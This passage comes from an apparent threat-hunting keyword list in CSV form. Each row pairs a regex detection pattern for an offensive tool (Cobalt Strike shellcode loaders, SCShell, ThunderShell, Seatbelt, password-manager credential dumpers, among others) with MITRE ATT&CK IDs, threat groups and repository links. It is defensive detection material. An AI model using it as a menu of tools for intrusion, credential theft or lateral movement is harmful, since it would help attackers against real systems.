T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*script/xor-bin.py*",".{0,1000}script\/xor\-bin\.py.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","3","203","37","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" "*script_main(wraith, cmdline)*",".{0,1000}script_main\(wraith,\scmdline\).{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*scripthost_uac_bypass*",".{0,1000}scripthost_uac_bypass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*scripts*Remote-WmiExecute.*",".{0,1000}scripts.{0,1000}Remote\-WmiExecute\..{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. 
All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*scripts*Search-EventForUser.ps1*",".{0,1000}scripts.{0,1000}Search\-EventForUser\.ps1.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*scripts/ghauri.py*",".{0,1000}scripts\/ghauri\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","1","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*scripts\ghauri.py*",".{0,1000}scripts\\ghauri\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" 
"*ScriptSentry-main.zip*",".{0,1000}ScriptSentry\-main\.zip.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*ScRunBase32.exe*",".{0,1000}ScRunBase32\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","178","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" "*ScRunBase32.py*",".{0,1000}ScRunBase32\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 
- T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","178","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" "*ScRunBase64.exe*",".{0,1000}ScRunBase64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera 
- APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","178","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" "*ScRunBase64.py*",".{0,1000}ScRunBase64\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","178","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" "*scshell*XblAuthManager*",".{0,1000}scshell.{0,1000}XblAuthManager.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*SCShell.exe*",".{0,1000}SCShell\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" 
"*scshell.py*",".{0,1000}scshell\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*scshellbof.c*",".{0,1000}scshellbof\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*scshellbof.o*",".{0,1000}scshellbof\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*scshellbofx64*",".{0,1000}scshellbofx64.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on 
ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*scumjr*dirtycow-vdso*",".{0,1000}scumjr.{0,1000}dirtycow\-vdso.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","10","942","392","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "*sd6aq2r6jvuoeisrudq7jbqufjh6nck5buuzjmgalicgwrobgfj4lkqd.onion*",".{0,1000}sd6aq2r6jvuoeisrudq7jbqufjh6nck5buuzjmgalicgwrobgfj4lkqd\.onion.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*Search cached MSI files in 
C:/Windows/Installer/*",".{0,1000}Search\scached\sMSI\sfiles\sin\sC\:\/Windows\/Installer\/.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*search_for_secrets(*",".{0,1000}search_for_secrets\(.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*Search-cpassword*",".{0,1000}Search\-cpassword.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Searching for master credentials (2/2)*",".{0,1000}Searching\sfor\smaster\scredentials\s\(2\/2\).{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" 
"*SearchOutlook.exe*",".{0,1000}SearchOutlook\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*searchsploit -m *",".{0,1000}searchsploit\s\-m\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*searchsploit -x *",".{0,1000}searchsploit\s\-x\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*searchsploit_rc*",".{0,1000}searchsploit_rc.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*seatbelt -*",".{0,1000}seatbelt\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*seatbelt all*",".{0,1000}seatbelt\sall.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - 
T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Seatbelt* -group=all*",".{0,1000}Seatbelt.{0,1000}\s\-group\=all.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*Seatbelt.Commands.Windows*",".{0,1000}Seatbelt\.Commands\.Windows.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*Seatbelt.Commands.Windows*",".{0,1000}Seatbelt\.Commands\.Windows.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Seatbelt.exe*",".{0,1000}Seatbelt\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 